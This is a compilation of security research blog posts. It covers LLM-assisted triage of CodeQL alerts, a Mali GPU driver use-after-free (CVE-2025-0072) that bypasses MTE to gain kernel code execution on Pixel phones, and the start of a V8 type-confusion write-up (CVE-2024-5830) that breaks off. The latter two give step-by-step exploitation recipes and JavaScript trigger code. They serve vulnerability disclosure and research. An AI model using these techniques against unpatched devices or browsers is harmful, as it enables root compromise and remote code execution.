Vulnerable workflow disabled explicitly in the repo. This can be checked easily by checking the workflow settings in the repo.
Vulnerable workflow explicitly restricts permissions and does not use any secrets. In which case, there is little privilege to gain.
Vulnerability specific issues, such as invalid user input or sanitizer in the case of code injection and the absence of a valid code execution point in the case of untrusted checkout.
Vulnerable workflow is a reusable workflow but not reachable from any workflow that runs in privileged context.

Very often, triaging these alerts involves many simple but tedious checks like the ones listed above, and an alert can be determined to be a false positive very quickly by one of the above criteria. We therefore model our triage taskflows based on these criteria.

So, our action-triage taskflows consist of the following tasks during information gathering and the auditing stage:

Workflow trigger analysis: This stage performs both information gathering and auditing. It first collects events that trigger the vulnerable workflow, as well as permission and secrets that are used in the vulnerable workflow. It also checks whether the vulnerable workflow is disabled in the repo. All information is local to the vulnerable workflow itself. This information is stored in running notes which are then serialized to a database entry. As the task is simple and involves only looking at the vulnerable workflow, preliminary auditing based on the workflow trigger is also performed to remove some obvious false positives.
Code injection point analysis: This is another task that only analyzes the vulnerable workflow and combines information gathering and audit in a single task. This task collects information about the location of the code injection point, and the user input that is injected. It also performs local auditing to check whether a user input is a valid injection risk and whether it has a sanitizer.
Workflow user analysis: This performs a simple caller analysis that looks for the caller of the vulnerable workflow. As it can potentially retrieve and analyze a large number of files, this step is divided into two main tasks that perform information gathering and auditing separately. In the information gathering task, callers of the vulnerable workflow are retrieved and their trigger events, permissions, use of secrets are recorded in the notes. This information is then used in the auditing task to determine whether the vulnerable workflow is reachable by an attacker.

Each of these tasks is applied to the alert and at each step, false positives are filtered out according to the criteria in the task.

After the information gathering and audit stage, our notes will generally include information such as the events that trigger the vulnerable workflow, permissions and secrets involved, and (in case of a reusable workflow) other workflows that use the vulnerable workflow as well as their trigger events, permissions, and secrets. This information will form the basis for the bug report. As a sanity check to ensure that the information collected so far is complete and consistent, the review_report task is used to check for missing or inconsistent information before a report is created.

After that, the create_report task is used to create a bug report which will form the basis of a GitHub Issue. Before creating an issue, we double check that the report contains the necessary information and conforms to the format that we required. Missing information or inconsistencies are likely the results of some failed steps or hallucinations and we reject those cases.

The following diagram illustrates the main components of the triage_actions_code_injection taskflow:

We then create GitHub Issues using the create_issue_actions taskflow. As mentioned before, the GitHub Issues created contain sufficient information and code references to verify the vulnerability quickly, as well as serving as a summary for the analysis so far, allowing us to continue further analysis using the issue. The following shows an example of an issue that is created:

In particular, we can use GitHub Issues and alert dismissal reasons as a means to incorporate repo-specific security measures and to further the analysis. To do so, we use the review_actions_injection_issues taskflow to first collect alert dismissal reasons from the repo. These dismissal reasons are then checked against the alert stated in the GitHub Issue. In this case, we simply use the issue as the starting point and instruct the LLM to audit the issue and check whether any of the alert dismissal reasons applies to the current issue. Since the issue contains all the relevant information and code references for the alert, the LLM is able to use the issue and the alert dismissal reasons to further the analysis and discover more false positives. The following shows an alert that is rejected based on the dismissal reasons:

The following diagram illustrates the main components of the issue creation and review taskflows:

JavaScript alerts

Similarly to triaging action alerts, we also triaged code scanning alerts for the JavaScript/TypeScript languages to a lesser extent. In the JavaScript world, we triaged code scanning alerts for the client-side cross-site-scripting CodeQL rule. (js/xss)

The client-side cross-site scripting alerts have more variety with regards to their sources, sinks, and data flows when compared to the GitHub Actions alerts.

The prompts for analyzing those XSS vulnerabilities are focused on helping the person responsible for triage make an educated decision, not making the decision for them. This is done by highlighting the aspects that seem to make a given alert exploitable by an attacker and, more importantly, what likely prevents the exploitation of a given potential issue. Other than that, the taskflows follow a similar scheme as described in the GitHub Actions alerts section.

While triaging XSS alerts manually, we’ve often identified false positives due to these reasons:

Custom or unrecognized sanitization functions (e.g. using regex) that the SAST-tool cannot verify.
Reported sources that are likely unreachable in practice (e.g., would require an attacker to send a message directly from the webserver).
Untrusted data flowing into potentially dangerous sinks, whose output then is only used in an non-exploitable way.
The SAST-tool not knowing the full context where the given untrusted data ends up.

Based on these false positives, the prompts in the relevant taskflow or even in the active personality were extended and adjusted. If you encounter certain false positives in a project, auditing it makes sense to extend the prompt so that false positives are correctly marked (and also if alerts for certain sources/sinks are not considered a vulnerability).

In the end, after executing the taskflows triage_js_ts_client_side_xss and create_issues_js_ts, the alert would result in GitHub issues such as:

While this is a sample for an alert worthy of following up (which turned out to be a true positive, being exploitable by using a javascript: URL), alerts that the taskflow agent decided were false positive get their issue labelled with “FP” (for false positive):

Taskflows development tips

In this section we share some of our experiences when working on these taskflows, and what we think are useful in the development of taskflows. We hope that these will help others create their own taskflows.

Use of database to store intermediate state

While developing a taskflow with multiple tasks, we sometimes encounter problems in tasks that run at a later stage. These can be simple software problems, such as API call failures, MCP server bugs, prompt-related problems, token problems, or quota problems.

By keeping tasks small and storing results of each task in a database, we avoided rerunning lengthy tasks when failure happens. When a task in a taskflow fails, we simply rerun the taskflow from the failed task and reuse the results from earlier tasks that are stored in the database. Apart from saving us time when a task failed, it also helped us to isolate effects of each task and tweak each task using the database created from the previous task as a starting point.

Breaking down complex tasks into smaller tasks

When we were developing the triage taskflows, the models that we used did not handle large context and complex tasks very well. When trying to perform complex and multiple tasks within the same context, we often ran into problems such as tasks being skipped or instructions not being followed.

To counter that, we divided tasks into smaller, independent tasks. Each started with a fresh new context. This helped reduce the context window size and alleviated many of the problems that we had.

One particular example is the use of templated repeat_prompt tasks, which loop over a list of tasks and start a new context for each of them. By doing this, instead of going through a list in the same prompt, we ensured that every single task was performed, while the context of each task was kept to a minimum.

An added benefit is that we are able to tweak and debug the taskflows with more granularity. By having small tasks and storing results of each task in a database, we can easily separate out part of a taskflow and run it separately.

Delegate to MCP server whenever possible

Initially, when checking and gathering information, such as workflow triggers, from the source code, we simply incorporated instructions in prompts because we thought the LLM should be able to gather the information from the source code. While this worked most of the time, we also noticed some inconsistencies due to the non-deterministic nature of the LLM. For example, the LLM sometimes would only record a subset of the events that trigger the workflow, or it would sometimes make inconsistent conclusions about whether the trigger runs the workflow in a privileged context or not.

Since these information and checks can easily be performed programmatically, we ended up creating tools in the MCP servers to gather the information and perform these checks. This led to a much more consistent outcome.

By moving most of the tasks that can easily be done programmatically to MCP server tools while leaving the more complex logical reasoning tasks, such as finding permission checks for the LLM, we were able to leverage the power of LLM while keeping the results consistent.

Reusable taskflow to apply tweaks across taskflows

As we were developing the triage taskflows, we realized that many tasks can be shared between different triage taskflows. To make sure that tweaks in one taskflow can be applied to the rest and to reduce the amount of copy and paste, we needed to have some ways to refactor the taskflows and extract reusable components.

We added features like reusable tasks and prompts. Using these features allowed us to reuse and apply changes consistently across different taskflows.

Configuring models across taskflows

As LLMs are constantly developing and new versions are released frequently, it soon became apparent that we need a way to update model version numbers across taskflows. So, we added the model configuration feature that allows us to change models across taskflows, which is useful when the model version needs updating or we just want to experiment and rerun the taskflows with a different model.

Closing

In this post we’ve shown how we created taskflows for the seclab-taskflow-agent to triage code scanning alerts.

By breaking down the triage into precise and specific tasks, we were able to automate many of the more repetitive tasks using LLM. By setting out clear and precise criteria in the prompts and asking for precise answers from the LLM to include code references, the LLM was able to perform the tasks as instructed while keeping the amount of hallucination to a minimum. This allows us to leverage the power of LLM to triage alerts and reduces the amount of false positives greatly without the need to validate the alert dynamically.

As a result, we were able to discover ~30 real world vulnerabilities from CodeQL alerts after running the triaging taskflows.

The discussed taskflows are published in our repo and we’re looking forward to seeing what you’re going to build using them! More recently, we’ve also done some further experiments in the area of AI assisted code auditing and vulnerability hunting, so stay tuned for what’s to come!

Get the guide to setting up the GitHub Security Lab Taskflow Agent >

Disclaimers:

When we use these taskflows to report vulnerabilities, our researchers review carefully all generated output before sending the report. We strongly recommend you do the same.
Note that running the taskflows can result in many tool calls, which can easily consume a large amount of quota.
The taskflows may create GitHub Issues. Please be considerate and seek the repo owner’s consent before running them on somebody else’s repo.

The post AI-supported vulnerability triage with the GitHub Security Lab Taskflow Agent appeared first on The GitHub Blog.

Bypassing MTE with CVE-2025-0072

Man Yue Mo — Fri, 23 May 2025 10:00:00 +0000

Memory Tagging Extension (MTE) is an advanced memory safety feature that is intended to make memory corruption vulnerabilities almost impossible to exploit. But no mitigation is ever completely airtight—especially in kernel code that manipulates memory at a low level.

Last year, I wrote about CVE-2023-6241, a vulnerability in ARM’s Mali GPU driver, which enabled an untrusted Android app to bypass MTE and gain arbitrary kernel code execution. In this post, I’ll walk through CVE-2025-0072: a newly patched vulnerability that I also found in ARM’s Mali GPU driver. Like the previous one, it enables a malicious Android app to bypass MTE and gain arbitrary kernel code execution.

I reported the issue to Arm on December 12, 2024. It was fixed in Mali driver version r54p0, released publicly on May 2, 2025, and included in Android’s May 2025 security update. The vulnerability affects devices with newer Arm Mali GPUs that use the Command Stream Frontend (CSF) architecture, such as Google’s Pixel 7, 8, and 9 series. I developed and tested the exploit on a Pixel 8 with kernel MTE enabled, and I believe it should work on the 7 and 9 as well with minor modifications.

What follows is a deep dive into how CSF queues work, the steps I used to exploit this bug, and how it ultimately bypasses MTE protections to achieve kernel code execution.

How CSF queues work—and how they become dangerous

Arm Mali GPUs with the CSF feature communicate with userland applications through command queues, implemented in the driver as kbase_queue objects. The queues are created by using the KBASE_IOCTL_CS_QUEUE_REGISTER ioctl. To use the kbase_queue that is created, it first has to be bound to a kbase_queue_group, which is created with the KBASE_IOCTL_CS_QUEUE_GROUP_CREATE ioctl. A kbase_queue can be bound to a kbase_queue_group with the KBASE_IOCTL_CS_QUEUE_BIND ioctl. When binding a kbase_queue to a kbase_queue_group, a handle is created from get_user_pages_mmap_handle and returned to the user application.

int kbase_csf_queue_bind(struct kbase_context *kctx, union kbase_ioctl_cs_queue_bind *bind)
{
            ...
	group = find_queue_group(kctx, bind->in.group_handle);
	queue = find_queue(kctx, bind->in.buffer_gpu_addr);
            …
	ret = get_user_pages_mmap_handle(kctx, queue);
	if (ret)
		goto out;
	bind->out.mmap_handle = queue->handle;
	group->bound_queues[bind->in.csi_index] = queue;
	queue->group = group;
	queue->group_priority = group->priority;
	queue->csi_index = (s8)bind->in.csi_index;
	queue->bind_state = KBASE_CSF_QUEUE_BIND_IN_PROGRESS;

out:
	rt_mutex_unlock(&kctx->csf.lock);

	return ret;
}

In addition, mutual references are stored between the kbase_queue_group and the queue. Note that when the call finishes, queue->bind_state is set to KBASE_CSF_QUEUE_BIND_IN_PROGRESS, indicating that the binding is not completed. To complete the binding, the user application must call mmap with the handle returned from the ioctl as the file offset. This mmap call is handled by kbase_csf_cpu_mmap_user_io_pages, which allocates GPU memory via kbase_csf_alloc_command_stream_user_pages and maps it to user space.

int kbase_csf_alloc_command_stream_user_pages(struct kbase_context *kctx, struct kbase_queue *queue)
{
	struct kbase_device *kbdev = kctx->kbdev;
	int ret;

	lockdep_assert_held(&kctx->csf.lock);

	ret = kbase_mem_pool_alloc_pages(&kctx->mem_pools.small[KBASE_MEM_GROUP_CSF_IO],
					 KBASEP_NUM_CS_USER_IO_PAGES, queue->phys, false,                 //<------ 1.
					 kctx->task);
  ...
	ret = kernel_map_user_io_pages(kctx, queue);
  ...
	get_queue(queue);
	queue->bind_state = KBASE_CSF_QUEUE_BOUND;
	mutex_unlock(&kbdev->csf.reg_lock);

	return 0;
  ...
}

In 1. in the above snippet, kbase_mem_pool_alloc_pages is called to allocate memory pages from the GPU memory pool, whose addresses are then stored in the queue->phys field. These pages are then mapped to user space and the bind_state of the queue is set to KBASE_CSF_QUEUE_BOUND. These pages are only freed when the mmapped area is unmapped from the user space. In that case, kbase_csf_free_command_stream_user_pages is called to free the pages via kbase_mem_pool_free_pages.

void kbase_csf_free_command_stream_user_pages(struct kbase_context *kctx, struct kbase_queue *queue)
{
	kernel_unmap_user_io_pages(kctx, queue);

	kbase_mem_pool_free_pages(&kctx->mem_pools.small[KBASE_MEM_GROUP_CSF_IO],
				  KBASEP_NUM_CS_USER_IO_PAGES, queue->phys, true, false);
  ...
}

This frees the pages stored in queue->phys, and because this only happens when the pages are unmapped from user space, it prevents the pages from being accessed after they are freed.

An exploit idea

The interesting part begins when we ask: what happens if we can modify queue->phys after mapping them into user space. For example, if I can trigger kbase_csf_alloc_command_user_pages again to overwrite new pages to queue->phys, and map them to user space and then unmap the previously mapped region, kbase_csf_free_command_stream_user_pages will be called to free the pages in queue->phys. However, because queue->phys is now overwritten by the newly allocated pages, I ended up in a situation where I free the new pages while unmapping an old region:

In the above figure, the right columns are mappings in the user space, green rectangles are mapped, while gray ones are unmapped. The left column are backing pages stored in queue->phys. The new queue->phys are pages that are currently stored in queue->phys, while old queue->phys are pages that are stored previously but are replaced by the new ones. Green indicates that the pages are alive, while red indicates that they are freed. After overwriting queue->phys and unmapping the old region, the new queue->phys are freed instead, while still mapped to the new user region. This means that user space will have access to the freed new queue->phys pages. This then gives me a page use-after-free vulnerability.

The vulnerability

So let’s take a look at how to achieve this situation. The first obvious thing to try is to see if I can bind a kbase_queue multiple times using the KBASE_IOCTL_CS_QUEUE_BIND ioctl. This, however, is not possible because the queue->group field is checked before binding:

int kbase_csf_queue_bind(struct kbase_context *kctx, union kbase_ioctl_cs_queue_bind *bind)
{
  ...
	if (queue->group || group->bound_queues[bind->in.csi_index])
		goto out;
  ...
}

After a kbase_queue is bound, its queue->group is set to the kbase_queue_group that it binds to, which prevents the kbase_queue from binding again. Moreover, once a kbase_queue is bound, it cannot be unbound via any ioctl. It can be terminated with KBASE_IOCTL_CS_QUEUE_TERMINATE, but that will also delete the kbase_queue. So if rebinding from the queue is not possible, what about trying to unbind from a kbase_queue_group? For example, what happens if a kbase_queue_group gets terminated with the KBASE_IOCTL_CS_QUEUE_GROUP_TERMINATE ioctl? When a kbase_queue_group terminates, as part of the clean up process, it calls kbase_csf_term_descheduled_queue_group to unbind queues that it bound to:

void kbase_csf_term_descheduled_queue_group(struct kbase_queue_group *group)
{
  ...
	for (i = 0; i < max_streams; i++) {
		struct kbase_queue *queue = group->bound_queues[i];

		/* The group is already being evicted from the scheduler */
		if (queue)
			unbind_stopped_queue(kctx, queue);
	}
  ...
}

This then resets the queue->group field of the kbase_queue that gets unbound:

static void unbind_stopped_queue(struct kbase_context *kctx, struct kbase_queue *queue)
{
  ...
	if (queue->bind_state != KBASE_CSF_QUEUE_UNBOUND) {
    ...
		queue->group->bound_queues[queue->csi_index] = NULL;
		queue->group = NULL;
    ...
		queue->bind_state = KBASE_CSF_QUEUE_UNBOUND;
	}
}

In particular, this now allows the kbase_queue to bind to another kbase_queue_group. This means I can now create a page use-after-free with the following steps:

Create a kbase_queue and a kbase_queue_group, and then bind the kbase_queue to the kbase_queue_group.
Create GPU memory pages for the user io pages in the kbase_queue and map them to user space using a mmap call. These pages are then stored in the queue->phys field of the kbase_queue.
Terminate the kbase_queue_group, which also unbinds the kbase_queue.
Create another kbase_queue_group and bind the kbase_queue to this new group.
Create new GPU memory pages for the user io pages in this kbase_queue and map them to user space. These pages now overwrite the existing pages in queue->phys.
Unmap the user space memory that was mapped in step 2. This then frees the pages in queue->phys and removes the user space mapping created in step 2. However, the pages that are freed are now the memory pages created and mapped in step 5, which are still mapped to user space.

This, in particular, means that the pages that are freed in step 6 of the above can still be accessed from the user application. By using a technique that I used previously, I can reuse these freed pages as page table global directories (PGD) of the Mali GPU.

To recap, let’s take a look at how the backing pages of a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used:

int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
    struct tagged_addr *pages, bool partial_allowed)
{
    ...
  /* Get pages from this pool */
  while (nr_from_pool--) {
    p = kbase_mem_pool_remove_locked(pool);     //<------- 1.
        ...
  }
    ...
  if (i != nr_4k_pages && pool->next_pool) {
    /* Allocate via next pool */
    err = kbase_mem_pool_alloc_pages(pool->next_pool,      //<----- 2.
        nr_4k_pages - i, pages + i, partial_allowed);
        ...
  } else {
    /* Get any remaining pages from kernel */
    while (i != nr_4k_pages) {
      p = kbase_mem_alloc_page(pool);     //<------- 3.
            ...
        }
        ...
  }
    ...
}

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages will be allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool, is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).

When freeing a page, the same happens in the opposite direction: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context, if the memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator.

As noted in my post “Corrupting memory without memory corruption”, pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context. It is also used for allocating page table global directories (PGD) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (Read the details of how to achieve this.)

Once the freed page is reused as a PGD of a GPU context, the user space mapping can be used to rewrite the PGD from the GPU. This then allows any kernel memory, including kernel code, to be mapped to the GPU, which allows me to rewrite kernel code and hence execute arbitrary kernel code. It also allows me to read and write arbitrary kernel data, so I can easily rewrite credentials of my process to gain root, as well as to disable SELinux.

See the exploit for Pixel 8 with some setup notes.

How does this bypass MTE?

Before wrapping up, let’s look at why this exploit manages to bypass Memory Tagging Extension (MTE)—despite protections that should have made this type of attack impossible.

The Memory Tagging Extension (MTE) is a security feature on newer Arm processors that uses hardware implementations to check for memory corruptions.

The Arm64 architecture uses 64 bit pointers to access memory, while most applications use a much smaller address space (for example, 39, 48, or 52 bits). The highest bits in a 64 bit pointer are actually unused. The main idea of memory tagging is to use these higher bits in an address to store a “tag” that can then be used to check against the other tag stored in the memory block associated with the address.

When a linear overflow happens and a pointer is used to dereference an adjacent memory block, the tag on the pointer is likely to be different from the tag in the adjacent memory block. By checking these tags at dereference time, such discrepancy, and hence the corrupted dereference can be detected. For use-after-free type memory corruptions, as long as the tag in a memory block is cleared every time it is freed and a new tag reassigned when it is allocated, dereferencing an already freed and reclaimed object will also lead to a discrepancy between pointer tag and the tag in memory, which allows use-after-free to be detected.

Image from Memory Tagging Extension: Enhancing memory safety through architecture published by Arm

The memory tagging extension is an instruction set introduced in the v8.5a version of the ARM architecture, which accelerates the process of tagging and checking of memory with the hardware. This makes it feasible to use memory tagging in practical applications. On architectures where hardware accelerated instructions are available, software support in the memory allocator is still needed to invoke the memory tagging instructions. In the linux kernel, the SLUB allocator, used for allocating kernel objects, and the buddy allocator, used for allocating memory pages, have support for memory tagging.

Readers who are interested in more details can, for example, consult this article and the whitepaper released by Arm.

As I mentioned in the introduction, this exploit is capable of bypassing MTE. However, unlike a previous vulnerability that I reported, where a freed memory page is accessed via the GPU, this bug accesses the freed memory page via user space mapping. Since page allocation and dereferencing is protected by MTE, it is perhaps somewhat surprising that this bug manages to bypass MTE. Initially, I thought this was because the memory page that is involved in the vulnerability is managed by kbase_mem_pool, which is a custom memory pool used by the Mali GPU driver. In the exploit, the freed memory page that is reused as the PGD is simply returned to the memory pool managed by kbase_mem_pool, and then allocated again from the memory pool. So the page was never truly freed by the buddy allocator and therefore not protected by MTE. While this is true, I decided to also try freeing the page properly and return it to the buddy allocator. To my surprise, MTE did not trigger even when the page is accessed after it is freed by the buddy allocator. After some experiments and source code reading, it appears that page mappings created by mgm_vmf_insert_pfn_prot in kbase_csf_user_io_pages_vm_fault, which are used for accessing the memory page after it is freed, ultimately uses insert_pfn to create the mapping, which inserts the page frame into the user space page table. I am not totally sure, but it seems that because the page frames are inserted directly into the user space page table, accessing those pages from user space does not require kernel level dereferencing and therefore does not trigger MTE.

Conclusion

In this post I’ve shown how CVE-2025-0072 can be used to gain arbitrary kernel code execution on a Pixel 8 with kernel MTE enabled. Unlike a previous vulnerability that I reported, which bypasses MTE by accessing freed memory from the GPU, this vulnerability accesses freed memory via user space memory mapping inserted by the driver. This shows that MTE can also be bypassed when freed memory pages are accessed via memory mappings in user space, which is a much more common scenario than the previous vulnerability.

The post Bypassing MTE with CVE-2025-0072 appeared first on The GitHub Blog.

From object transition to RCE in the Chrome renderer

Man Yue Mo — Tue, 13 Aug 2024 15:00:11 +0000

In this post, I’ll exploit CVE-2024-5830, a type confusion bug in v8, the Javascript engine of Chrome that I reported in May 2024 as bug 342456991. The bug was fixed in version 126.0.6478.56/57. This bug allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.

Object map and map transitions in V8

This section contains some background materials in object maps and transitions that are needed to understand the vulnerability. Readers who are familiar with this can skip to the next section.

The concept of a map (or hidden class) is fairly fundamental to Javascript interpreters. It represents the memory layout of an object and is crucial in the optimization of property access. There are already many good articles that go into much more detail on this topic. I particularly recommend “JavaScript engine fundamentals: Shapes and Inline Caches” by Mathias Bynens.

A map holds an array of property descriptors (DescriptorArrays) that contains information about each property. It also holds details about the elements of the object and its type.

Maps are shared between objects with the same property layout. For example, the following objects both have a single property a of type SMI (31 bit integers), so they can share the same map.


o1 = {a : 1};
o2 = {a : 10000};  //<------ same map as o1, MapA

Maps also account property types in an object. For example, the following object, o3 has a map different from o1 and o2, because its property a is of type double (HeapNumber), rather than SMI:


o3 = {a : 1.1};

When a new property is added to an object, if a map does not already exist for the new object layout, a new map will be created.


o1.b = 1; //<------ new map with SMI properties a and b

When this happens, the old and the new map are related by a transition:


%DebugPrint(o2);
DebugPrint: 0x3a5d00049001: [JS_OBJECT_TYPE]
 - map: 0x3a5d00298911  [FastProperties]
 ...
 - All own properties (excluding elements): {
    0x3a5d00002b19: [String] in ReadOnlySpace: #a: 10000 (const data field 0), location: in-object
 }
0x3a5d00298911: [Map] in OldSpace
 - map: 0x3a5d002816d9 
 ...
 - instance descriptors #1: 0x3a5d00049011 
 - transitions #1: 0x3a5d00298999 
     0x3a5d00002b29: [String] in ReadOnlySpace: #b: (transition to (const data field, attrs: [WEC]) @ Any) -> 0x3a5d00298999 
 ...

Note that the map of o2 contains a transition to another map (0x3a5d00298999), which is the newly created map for o3:


%DebugPrint(o3);
DebugPrint: 0x3a5d00048fd5: [JS_OBJECT_TYPE]
 - map: 0x3a5d00298999  [FastProperties]
 ...
 - All own properties (excluding elements): {
    0x3a5d00002b19: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
    0x3a5d00002b29: [String] in ReadOnlySpace: #b: 1 (const data field 1), location: properties[0]
 }
0x3a5d00298999: [Map] in OldSpace
 - map: 0x3a5d002816d9 
 ...
 - back pointer: 0x3a5d00298911 
 ...

Conversely, the map of o2 (0x3a5d00298911) is stored in this new map as the back pointer. A map can store multiple transitions in a TransitionArray. For example, if another property c is added to o2, then the TransitionArray will contain two transitions, one to property b and another to property c:


o4 = {a : 1};
o2.c = 1;
%DebugPrint(o4);
DebugPrint: 0x2dd400049055: [JS_OBJECT_TYPE]
 - map: 0x2dd400298941  [FastProperties]
 - All own properties (excluding elements): {
    0x2dd400002b19: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
 }
0x2dd400298941: [Map] in OldSpace
 - map: 0x2dd4002816d9 
 ...
 - transitions #2: 0x2dd400298a35 Transition array #2:
     0x2dd400002b39: [String] in ReadOnlySpace: #c: (transition to (const data field, attrs: [WEC]) @ Any) -> 0x2dd400298a0d 
     0x2dd400002b29: [String] in ReadOnlySpace: #b: (transition to (const data field, attrs: [WEC]) @ Any) -> 0x2dd4002989c9 
 ...

When a field of type SMI in an object is assigned a double (HeapNumber) value, because the SMI type cannot hold a double value, the map of the object needs to change to reflect this:


o1 = {a : 1};
o2 = {a : 1};
o1 = {a : 1.1};
%DebugPrint(o1);
DebugPrint: 0x1b4e00049015: [JS_OBJECT_TYPE]
 - map: 0x1b4e002989a1  [FastProperties]
 ...
 - All own properties (excluding elements): {
    0x1b4e00002b19: [String] in ReadOnlySpace: #a: 0x1b4e00049041  (const data field 0), location: in-object
 }
...
%DebugPrint(o2);
DebugPrint: 0x1b4e00049005: [JS_OBJECT_TYPE]
 - map: 0x1b4e00298935  [FastProperties]
 ...
 - All own properties (excluding elements): {
    0x1b4e00002b19: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
 }
0x1b4e00298935: [Map] in OldSpace
 ...
 - deprecated_map
 ...

Note that, not only do o1 and o2 have different maps, but the map of o2 is also marked as deprecated. This means that when a new object of the same property layout is created, it’ll use the map of o1 (0x1b4e002989a1) instead of that of o2 (0x1b4e00298935) because a more general map, the map of o1, whose field can represent both HeapNumber and SMI, is now available. Moreover, the map of o2 will also be updated to the map of o1 when its properties are accessed. This is done via the UpdateImpl function:


Handle MapUpdater::UpdateImpl() {
  ...
  if (FindRootMap() == kEnd) return result_map_;
  if (FindTargetMap() == kEnd) return result_map_;
  if (ConstructNewMap() == kAtIntegrityLevelSource) {
    ConstructNewMapWithIntegrityLevelTransition();
  }
  ...
  return result_map_;
}

Essentially, the function uses the back pointer of a map to retrace the transitions until it reaches the first map that does not have a backpointer (the RootMap). It then goes through the transitions from the RootMap to check if there already exists a suitable map in the transitions that can be used for the object (FindTargetMap). If a suitable map is found, then ConstructNewMap will create a new map which is then used by the object.

For example, in the following case, a map with three properties becomes deprecated when the second property is assigned a HeapNumber value:


obj = {a : 1};
obj.b = 1;
obj.c = 1; //<---- Map now has 3 SMI properties
obj.b = 1.1 //<----- original map becomes deprecated and a new map is created

In this case, two new maps are created. First a map with properties a and b of types SMI and HeapNumber respectively, then another map with three properties, a : SMI, b : HeapNumber and c : SMI to accommodate the new property layout:

In the above image, the red maps become deprecated and the green maps are newly created maps. After the property assignment, obj will be using the newly created map that has properties a, b and c and the transitions to the deprecated red maps are removed and replaced by the new green transitions.

In v8, object properties can be stored in an array or in a dictionary. Objects with properties stored in an array are referred to as fast objects, while objects with properties in dictionaries are dictionary objects. Map transitions and deprecations are specific to fast objects and normally, when a map deprecation happens, another fast map is created by UpdateImpl. This, however, is not necessarily the case. Let’s take a look at a slightly different example:


obj = {a : 1};
obj.b = 1;    //<---- MapB
obj.c = 1;    //<---- MapC

obj2 = {a : 1};
obj2.b = 1;  //<----- MapB
obj2.b = 1.1;   //<---- map of obj becomes deprecated

Assigning a HeapNumber to obj2.b causes both the original map of obj2 (MapB), as well as the map of obj (MapC) to become deprecated. This is because the map of obj (MapC) is now a transition of a deprecated map (MapB), which causes it to become deprecated as well:

As obj now has a deprecated map, its map will be updated when any of its property is accessed:


x = obj.a; //<---- calls UpdateImpl to update the map of obj

In this case, a new map has to be created and a new transition is added to the map of obj2. However, there is a limited number of transitions that a map can hold. Prior to adding a new transition, a check is carried out to ensure that the map can hold another transition:


MapUpdater::State MapUpdater::ConstructNewMap() {
  ...
  if (maybe_transition.is_null() &&
      !TransitionsAccessor::CanHaveMoreTransitions(isolate_, split_map)) {
    return Normalize("Normalize_CantHaveMoreTransitions");
  }
  ...

If no more transitions can be added, then a new dictionary map will be created via Normalize.


obj = {a : 1};
obj.b = 1;
obj.c = 1;

obj2 = {a : 1};
obj2.b = 1.1;   //<---- map of obj becomes deprecated

//Add transitions to the map of obj2
for (let i = 0; i < 1024 + 512; i++) {
  let tmp = {a : 1};
  tmp.b = 1.1;
  tmp['c' + i] = 1;
}

obj.a = 1; //<----- calls UpdateImpl to update map of obj

As the map of obj2 cannot hold anymore transitions, a new dictionary map is created for obj after its property is accessed. This behavior is somewhat unexpected, so Update is often followed by a debug assertion to ensure that the updated map is not a dictionary map (DCHECK is only active in a debug build):


Handle Map::PrepareForDataProperty(Isolate* isolate, Handle map,
                                        InternalIndex descriptor,
                                        PropertyConstness constness,
                                        Handle value) {
  // Update to the newest map before storing the property.
  map = Update(isolate, map);
  // Dictionaries can store any property value.
  DCHECK(!map->is_dictionary_map());
  return UpdateDescriptorForValue(isolate, map, descriptor, constness, value);
}

The vulnerability

While most uses of the function PrepareForDataProperty cannot result in a dictionary map after Update is called, PrepareForDataProperty can be called by CreateDataProperty via TryFastAddDataProperty, which may result in a dictionary map after updating. There are different paths that use CreateDataProperty, but one particularly interesting path is in object cloning. When an object is copied using the spread syntax, a shallow copy of the original object is created:


var obj1 = {a : 1};
const clonedObj = { ...obj1 };

In this case, CreateDataProperty is used for creating new properties in clonedObj and to update its map when appropriate. However, if the object being cloned, obj1 contains a property accessor, then it’ll be called while the object is being cloned. For example, in the following case:


var x = {};
x.a0 = 1;
x.__defineGetter__("prop", function() {
  return 1;
});

var y = {...x};

In this case, when x is cloned into y, the property accessor prop in x is called after the property a0 is copied to y. At this point, the map of y contains only the SMI property a0 and it is possible for the accessor to cause the map of y to become deprecated.


var x = {};
x.a0 = 1;
x.__defineGetter__("prop", function() {
  let obj = {};
  obj.a0 = 1;   //<--- obj has same map as y at this point
  obj.a0 = 1.5;  //<--- map of y becomes deprecated
  return 1;
});

var y = {...x};

When CreateDataProperty is called to copy the property prop, Update in PrepareForDataProperty is called to update the deprecated map of y. As explained before, by adding transitions to the map of obj in the property accessor, it is possible to cause the map update to return a dictionary map for y. Since the subsequent use of the updated map in PrepareForDataProperty assumes the updated map to be a fast map, rather than a dictionary map, this can corrupt the object y in various ways.

Gaining arbitrary read and write in the v8 heap

To begin with, let’s take a look at how the updated map is used in PrepareForDataProperty:


Handle Map::PrepareForDataProperty(Isolate* isolate, Handle map,
                                        InternalIndex descriptor,
                                        PropertyConstness constness,
                                        Handle value) {
  map = Update(isolate, map);
  ...
  return UpdateDescriptorForValue(isolate, map, descriptor, constness, value);
}

The updated map is first used by UpdateDescriptorForValue.


Handle UpdateDescriptorForValue(Isolate* isolate, Handle map,
                                     InternalIndex descriptor,
                                     PropertyConstness constness,
                                     Handle value) {
  if (CanHoldValue(map->instance_descriptors(isolate), descriptor, constness,
                   *value)) {
    return map;
  }
  ...
  return mu.ReconfigureToDataField(descriptor, attributes, constness,
